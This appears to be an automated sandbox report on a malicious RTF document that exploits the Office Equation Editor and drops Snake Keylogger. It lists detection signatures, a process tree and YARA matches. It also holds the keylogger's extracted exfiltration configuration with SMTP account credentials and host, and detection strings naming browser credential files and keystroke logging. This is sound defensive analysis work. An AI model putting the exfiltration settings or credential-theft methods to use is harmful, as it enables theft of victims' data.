Edit tour

Windows Analysis Report
SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf

Overview

General Information

Sample Name:	SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf
Analysis ID:	756118
MD5:	f2de9aa2a7a3c9890d2f799adc95c35b
SHA1:	404dabf3e31da0bbf666df6397f803983961794f
SHA256:	d04bf8b1677e02ada795c9a0e84abfca0ba2c1565736e9f34115783af32be764
Tags:	rtf
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet

Multi AV Scanner detection for submitted file

Yara detected Snake Keylogger

Malicious sample detected (through community Yara rule)

Yara detected Telegram RAT

Yara detected AntiVM3

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Tries to steal Mail credentials (via file / registry access)

Tries to harvest and steal ftp login credentials

.NET source code references suspicious native API functions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

May check the online IP address of the machine

Injects a PE file into a foreign processes

Yara detected Generic Downloader

Office equation editor drops PE file

Machine Learning detection for dropped file

Office equation editor establishes network connection

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Yara detected Credential Stealer

Potential document exploit detected (performs DNS queries)

IP address seen in connection with other malware

Downloads executable code via HTTP

Contains long sleeps (>= 3 min)

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Potential document exploit detected (unknown TCP traffic)

Drops PE files

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 3024 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)

EQNEDT32.EXE (PID: 1236 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

rinzearec84736.exe (PID: 296 cmdline: C:\Users\user\AppData\Roaming\rinzearec84736.exe MD5: D248194D56895A1FAE8914E81CD9B36A)

rinzearec84736.exe (PID: 648 cmdline: C:\Users\user\AppData\Roaming\rinzearec84736.exe MD5: D248194D56895A1FAE8914E81CD9B36A)

EQNEDT32.EXE (PID: 2648 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "arinzelog@saonline.xyz", "Password": "7213575aceACE@#$", "Host": "cp5ua.hyperhost.ua", "Port": "587"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf	SUSP_INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embedding one of the object mostly observed in exploit (e.g. CVE-2017-11882) documents.	ditekSHen	0x1d14:$obj2: \objdata 0x1edb:$obj3: \objupdate 0x1cf0:$obj4: \objemb
SecuriteInfo.com.Exploit.CVE-2018-0798.4.11301.24836.rtf	INDICATOR_RTF_MalVer_Objects	Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.	ditekSHen	0x1d14:$obj2: \objdata 0x1edb:$obj3: \objupdate 0x1cf0:$obj4: \objemb

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x176cc:$x1: $%SMTPDV$ 0x176e2:$x2: $#TheHashHere%& 0x18be3:$x3: %FTPDV$ 0x18ca7:$x4: $%TelegramDv$ 0x14f65:$x5: KeyLoggerEventArgs 0x152fb:$x5: KeyLoggerEventArgs 0x18c07:$m2: Clipboard Logs ID 0x18e0d:$m2: Screenshot Logs ID 0x18f1d:$m2: keystroke Logs ID 0x19101:$m3: SnakePW 0x18de5:$m4: \SnakeKeylogger\
00000006.00000000.919229211.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13d90:$a1: get_encryptedPassword 0x1407c:$a2: get_encryptedUsername 0x13b9c:$a3: get_timePasswordChanged 0x13c97:$a4: get_passwordField 0x13da6:$a5: set_encryptedPassword 0x15398:$a7: get_logins 0x152fb:$a10: KeyLoggerEventArgs 0x14f65:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.923783682.0000000002498000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.922046499.0000000002241000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5c4c4:$x1: $%SMTPDV$ 0x7c4e4:$x1: $%SMTPDV$ 0x9c304:$x1: $%SMTPDV$ 0x5c4da:$x2: $#TheHashHere%& 0x7c4fa:$x2: $#TheHashHere%& 0x9c31a:$x2: $#TheHashHere%& 0x5d9db:$x3: %FTPDV$ 0x7d9fb:$x3: %FTPDV$ 0x9d81b:$x3: %FTPDV$ 0x5da9f:$x4: $%TelegramDv$ 0x7dabf:$x4: $%TelegramDv$ 0x9d8df:$x4: $%TelegramDv$ 0x59d5d:$x5: KeyLoggerEventArgs 0x5a0f3:$x5: KeyLoggerEventArgs 0x79d7d:$x5: KeyLoggerEventArgs 0x7a113:$x5: KeyLoggerEventArgs 0x99b9d:$x5: KeyLoggerEventArgs 0x99f33:$x5: KeyLoggerEventArgs 0x5d9ff:$m2: Clipboard Logs ID 0x5dc05:$m2: Screenshot Logs ID 0x5dd15:$m2: keystroke Logs ID
00000005.00000002.924373144.0000000003374000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x58b88:$a1: get_encryptedPassword 0x78ba8:$a1: get_encryptedPassword 0x989c8:$a1: get_encryptedPassword 0x58e74:$a2: get_encryptedUsername 0x78e94:$a2: get_encryptedUsername 0x98cb4:$a2: get_encryptedUsername 0x58994:$a3: get_timePasswordChanged 0x789b4:$a3: get_timePasswordChanged 0x987d4:$a3: get_timePasswordChanged 0x58a8f:$a4: get_passwordField 0x78aaf:$a4: get_passwordField 0x988cf:$a4: get_passwordField 0x58b9e:$a5: set_encryptedPassword 0x78bbe:$a5: set_encryptedPassword 0x989de:$a5: set_encryptedPassword 0x5a190:$a7: get_logins 0x7a1b0:$a7: get_logins 0x99fd0:$a7: get_logins 0x5a0f3:$a10: KeyLoggerEventArgs 0x7a113:$a10: KeyLoggerEventArgs 0x99f33:$a10: KeyLoggerEventArgs
Process Memory Space: rinzearec84736.exe PID: 296	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: rinzearec84736.exe PID: 296	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rinzearec84736.exe PID: 296	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rinzearec84736.exe PID: 296	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rinzearec84736.exe PID: 296	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0xb1537:$x5: KeyLoggerEventArgs 0xb18cd:$x5: KeyLoggerEventArgs 0xb23f3:$x5: KeyLoggerEventArgs 0xb2754:$x5: KeyLoggerEventArgs 0xb3cd5:$m2: Clipboard Logs ID 0xb3dbf:$m2: Screenshot Logs ID 0xb3e15:$m2: keystroke Logs ID 0xb3ecf:$m3: SnakePW 0xb3dab:$m4: \SnakeKeylogger\
Process Memory Space: rinzearec84736.exe PID: 296	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xaf738:$a1: get_encryptedPassword 0xafa1a:$a2: get_encryptedUsername 0xaf54e:$a3: get_timePasswordChanged 0xaf649:$a4: get_passwordField 0xaf74e:$a5: set_encryptedPassword 0xb196a:$a7: get_logins 0xb18cd:$a10: KeyLoggerEventArgs 0xb1537:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: rinzearec84736.exe PID: 648	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: rinzearec84736.exe PID: 648	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rinzearec84736.exe PID: 648	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rinzearec84736.exe PID: 648	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x3353:$x5: KeyLoggerEventArgs 0x36e9:$x5: KeyLoggerEventArgs 0x420f:$x5: KeyLoggerEventArgs 0x4570:$x5: KeyLoggerEventArgs 0x5af1:$m2: Clipboard Logs ID 0x5bdb:$m2: Screenshot Logs ID 0x5c31:$m2: keystroke Logs ID 0x5ceb:$m3: SnakePW 0x5bc7:$m4: \SnakeKeylogger\
Process Memory Space: rinzearec84736.exe PID: 648	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1554:$a1: get_encryptedPassword 0x1836:$a2: get_encryptedUsername 0x136a:$a3: get_timePasswordChanged 0x1465:$a4: get_passwordField 0x156a:$a5: set_encryptedPassword 0x3786:$a7: get_logins 0x36e9:$a10: KeyLoggerEventArgs 0x3353:$a11: KeyLoggerEventArgsEventHandler
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.3.EQNEDT32.EXE.5c2588.0.raw.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0x23f8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x23f8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
2.3.EQNEDT32.EXE.5c2588.0.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0x5f8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x5f8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
2.2.EQNEDT32.EXE.5c2588.0.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0x5f8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x5f8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
2.2.EQNEDT32.EXE.5c2588.0.raw.unpack	APT_NK_Methodology_Artificial_UserAgent_IE_Win7	Detects hard-coded User-Agent string that has been present in several APT37 malware families.	Steve Miller aka @stvemillertime	0x23f8:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 0x23f8:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...
5.2.rinzearec84736.exe.33d8c18.9.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x198d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18b05:$a3: \Google\Chrome\User Data\Default\Login Data 0x18f38:$a4: \Orbitum\User Data\Default\Login Data 0x1a05f:$a5: \Kometa\User Data\Default\Login Data
5.2.rinzearec84736.exe.33d8c18.9.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12d07:$s1: UnHook 0x12d0e:$s2: SetHook 0x12d16:$s3: CallNextHook 0x12d23:$s4: _hook
5.2.rinzearec84736.exe.33d8c18.9.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15acc:$x1: $%SMTPDV$ 0x15ae2:$x2: $#TheHashHere%& 0x16fe3:$x3: %FTPDV$ 0x170a7:$x4: $%TelegramDv$ 0x13365:$x5: KeyLoggerEventArgs 0x136fb:$x5: KeyLoggerEventArgs 0x17007:$m2: Clipboard Logs ID 0x1720d:$m2: Screenshot Logs ID 0x1731d:$m2: keystroke Logs ID 0x17501:$m3: SnakePW 0x171e5:$m4: \SnakeKeylogger\
5.2.rinzearec84736.exe.33d8c18.9.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12190:$a1: get_encryptedPassword 0x1247c:$a2: get_encryptedUsername 0x11f9c:$a3: get_timePasswordChanged 0x12097:$a4: get_passwordField 0x121a6:$a5: set_encryptedPassword 0x13798:$a7: get_logins 0x136fb:$a10: KeyLoggerEventArgs 0x13365:$a11: KeyLoggerEventArgsEventHandler
5.2.rinzearec84736.exe.33b8bf8.8.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x198d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x18b05:$a3: \Google\Chrome\User Data\Default\Login Data 0x18f38:$a4: \Orbitum\User Data\Default\Login Data 0x1a05f:$a5: \Kometa\User Data\Default\Login Data
5.2.rinzearec84736.exe.33b8bf8.8.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x12d07:$s1: UnHook 0x12d0e:$s2: SetHook 0x12d16:$s3: CallNextHook 0x12d23:$s4: _hook
5.2.rinzearec84736.exe.33b8bf8.8.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15acc:$x1: $%SMTPDV$ 0x15ae2:$x2: $#TheHashHere%& 0x16fe3:$x3: %FTPDV$ 0x170a7:$x4: $%TelegramDv$ 0x13365:$x5: KeyLoggerEventArgs 0x136fb:$x5: KeyLoggerEventArgs 0x17007:$m2: Clipboard Logs ID 0x1720d:$m2: Screenshot Logs ID 0x1731d:$m2: keystroke Logs ID 0x17501:$m3: SnakePW 0x171e5:$m4: \SnakeKeylogger\
5.2.rinzearec84736.exe.33b8bf8.8.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x12190:$a1: get_encryptedPassword 0x1247c:$a2: get_encryptedUsername 0x11f9c:$a3: get_timePasswordChanged 0x12097:$a4: get_passwordField 0x121a6:$a5: set_encryptedPassword 0x13798:$a7: get_logins 0x136fb:$a10: KeyLoggerEventArgs 0x13365:$a11: KeyLoggerEventArgsEventHandler
5.2.rinzearec84736.exe.226663c.4.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
5.2.rinzearec84736.exe.226663c.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0xd316:$v1: SbieDll.dll 0xd330:$v2: USER 0xd33c:$v3: SANDBOX 0xd34e:$v4: VIRUS 0xd39e:$v4: VIRUS 0xd35c:$v5: MALWARE 0xd36e:$v6: SCHMIDTI 0xd382:$v7: CURRENTUSER
5.2.rinzearec84736.exe.2249628.3.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
5.2.rinzearec84736.exe.2249628.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste	Detects executables potentially checking for WinJail sandbox window	ditekSHen	0x2a32a:$v1: SbieDll.dll 0x2a344:$v2: USER 0x2a350:$v3: SANDBOX 0x2a362:$v4: VIRUS 0x2a3b2:$v4: VIRUS 0x2a370:$v5: MALWARE 0x2a382:$v6: SCHMIDTI 0x2a396:$v7: CURRENTUSER
6.0.rinzearec84736.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1b6d3:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1a905:$a3: \Google\Chrome\User Data\Default\Login Data 0x1ad38:$a4: \Orbitum\User Data\Default\Login Data 0x1be5f:$a5: \Kometa\User Data\Default\Login Data
6.0.rinzearec84736.exe.400000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
6.0.rinzearec84736.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.0.rinzearec84736.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.0.rinzearec84736.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.0.rinzearec84736.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14b07:$s1: UnHook 0x14b0e:$s2: SetHook 0x14b16:$s3: CallNextHook 0x14b23:$s4: _hook
6.0.rinzearec84736.exe.400000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x178cc:$x1: $%SMTPDV$ 0x178e2:$x2: $#TheHashHere%& 0x18de3:$x3: %FTPDV$ 0x18ea7:$x4: $%TelegramDv$ 0x15165:$x5: KeyLoggerEventArgs 0x154fb:$x5: KeyLoggerEventArgs 0x18e07:$m2: Clipboard Logs ID 0x1900d:$m2: Screenshot Logs ID 0x1911d:$m2: keystroke Logs ID 0x19301:$m3: SnakePW 0x18fe5:$m4: \SnakeKeylogger\
6.0.rinzearec84736.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13f90:$a1: get_encryptedPassword 0x1427c:$a2: get_encryptedUsername 0x13d9c:$a3: get_timePasswordChanged 0x13e97:$a4: get_passwordField 0x13fa6:$a5: set_encryptedPassword 0x15598:$a7: get_logins 0x154fb:$a10: KeyLoggerEventArgs 0x15165:$a11: KeyLoggerEventArgsEventHandler
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14b07:$s1: UnHook 0x34927:$s1: UnHook 0x14b0e:$s2: SetHook 0x3492e:$s2: SetHook 0x14b16:$s3: CallNextHook 0x34936:$s3: CallNextHook 0x14b23:$s4: _hook 0x34943:$s4: _hook
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x178cc:$x1: $%SMTPDV$ 0x376ec:$x1: $%SMTPDV$ 0x178e2:$x2: $#TheHashHere%& 0x37702:$x2: $#TheHashHere%& 0x18de3:$x3: %FTPDV$ 0x38c03:$x3: %FTPDV$ 0x18ea7:$x4: $%TelegramDv$ 0x38cc7:$x4: $%TelegramDv$ 0x15165:$x5: KeyLoggerEventArgs 0x154fb:$x5: KeyLoggerEventArgs 0x34f85:$x5: KeyLoggerEventArgs 0x3531b:$x5: KeyLoggerEventArgs 0x18e07:$m2: Clipboard Logs ID 0x1900d:$m2: Screenshot Logs ID 0x1911d:$m2: keystroke Logs ID 0x38c27:$m2: Clipboard Logs ID 0x38e2d:$m2: Screenshot Logs ID 0x38f3d:$m2: keystroke Logs ID 0x19301:$m3: SnakePW 0x39121:$m3: SnakePW 0x18fe5:$m4: \SnakeKeylogger\
5.2.rinzearec84736.exe.33d8c18.9.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13f90:$a1: get_encryptedPassword 0x33db0:$a1: get_encryptedPassword 0x1427c:$a2: get_encryptedUsername 0x3409c:$a2: get_encryptedUsername 0x13d9c:$a3: get_timePasswordChanged 0x33bbc:$a3: get_timePasswordChanged 0x13e97:$a4: get_passwordField 0x33cb7:$a4: get_passwordField 0x13fa6:$a5: set_encryptedPassword 0x33dc6:$a5: set_encryptedPassword 0x15598:$a7: get_logins 0x353b8:$a7: get_logins 0x154fb:$a10: KeyLoggerEventArgs 0x3531b:$a10: KeyLoggerEventArgs 0x15165:$a11: KeyLoggerEventArgsEventHandler 0x34f85:$a11: KeyLoggerEventArgsEventHandler
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14b07:$s1: UnHook 0x34b27:$s1: UnHook 0x54947:$s1: UnHook 0x14b0e:$s2: SetHook 0x34b2e:$s2: SetHook 0x5494e:$s2: SetHook 0x14b16:$s3: CallNextHook 0x34b36:$s3: CallNextHook 0x54956:$s3: CallNextHook 0x14b23:$s4: _hook 0x34b43:$s4: _hook 0x54963:$s4: _hook
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x178cc:$x1: $%SMTPDV$ 0x378ec:$x1: $%SMTPDV$ 0x5770c:$x1: $%SMTPDV$ 0x178e2:$x2: $#TheHashHere%& 0x37902:$x2: $#TheHashHere%& 0x57722:$x2: $#TheHashHere%& 0x18de3:$x3: %FTPDV$ 0x38e03:$x3: %FTPDV$ 0x58c23:$x3: %FTPDV$ 0x18ea7:$x4: $%TelegramDv$ 0x38ec7:$x4: $%TelegramDv$ 0x58ce7:$x4: $%TelegramDv$ 0x15165:$x5: KeyLoggerEventArgs 0x154fb:$x5: KeyLoggerEventArgs 0x35185:$x5: KeyLoggerEventArgs 0x3551b:$x5: KeyLoggerEventArgs 0x54fa5:$x5: KeyLoggerEventArgs 0x5533b:$x5: KeyLoggerEventArgs 0x18e07:$m2: Clipboard Logs ID 0x1900d:$m2: Screenshot Logs ID 0x1911d:$m2: keystroke Logs ID
5.2.rinzearec84736.exe.33b8bf8.8.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x13f90:$a1: get_encryptedPassword 0x33fb0:$a1: get_encryptedPassword 0x53dd0:$a1: get_encryptedPassword 0x1427c:$a2: get_encryptedUsername 0x3429c:$a2: get_encryptedUsername 0x540bc:$a2: get_encryptedUsername 0x13d9c:$a3: get_timePasswordChanged 0x33dbc:$a3: get_timePasswordChanged 0x53bdc:$a3: get_timePasswordChanged 0x13e97:$a4: get_passwordField 0x33eb7:$a4: get_passwordField 0x53cd7:$a4: get_passwordField 0x13fa6:$a5: set_encryptedPassword 0x33fc6:$a5: set_encryptedPassword 0x53de6:$a5: set_encryptedPassword 0x15598:$a7: get_logins 0x355b8:$a7: get_logins 0x553d8:$a7: get_logins 0x154fb:$a10: KeyLoggerEventArgs 0x3551b:$a10: KeyLoggerEventArgs 0x5533b:$a10: KeyLoggerEventArgs
5.2.rinzearec84736.exe.33745d8.10.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
5.2.rinzearec84736.exe.33745d8.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.rinzearec84736.exe.33745d8.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
5.2.rinzearec84736.exe.33745d8.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.rinzearec84736.exe.33745d8.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x59127:$s1: UnHook 0x79147:$s1: UnHook 0x98f67:$s1: UnHook 0x5912e:$s2: SetHook 0x7914e:$s2: SetHook 0x98f6e:$s2: SetHook 0x59136:$s3: CallNextHook 0x79156:$s3: CallNextHook 0x98f76:$s3: CallNextHook 0x59143:$s4: _hook 0x79163:$s4: _hook 0x98f83:$s4: _hook
5.2.rinzearec84736.exe.33745d8.10.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x5beec:$x1: $%SMTPDV$ 0x7bf0c:$x1: $%SMTPDV$ 0x9bd2c:$x1: $%SMTPDV$ 0x5bf02:$x2: $#TheHashHere%& 0x7bf22:$x2: $#TheHashHere%& 0x9bd42:$x2: $#TheHashHere%& 0x5d403:$x3: %FTPDV$ 0x7d423:$x3: %FTPDV$ 0x9d243:$x3: %FTPDV$ 0x5d4c7:$x4: $%TelegramDv$ 0x7d4e7:$x4: $%TelegramDv$ 0x9d307:$x4: $%TelegramDv$ 0x59785:$x5: KeyLoggerEventArgs 0x59b1b:$x5: KeyLoggerEventArgs 0x797a5:$x5: KeyLoggerEventArgs 0x79b3b:$x5: KeyLoggerEventArgs 0x995c5:$x5: KeyLoggerEventArgs 0x9995b:$x5: KeyLoggerEventArgs 0x5d427:$m2: Clipboard Logs ID 0x5d62d:$m2: Screenshot Logs ID 0x5d73d:$m2: keystroke Logs ID
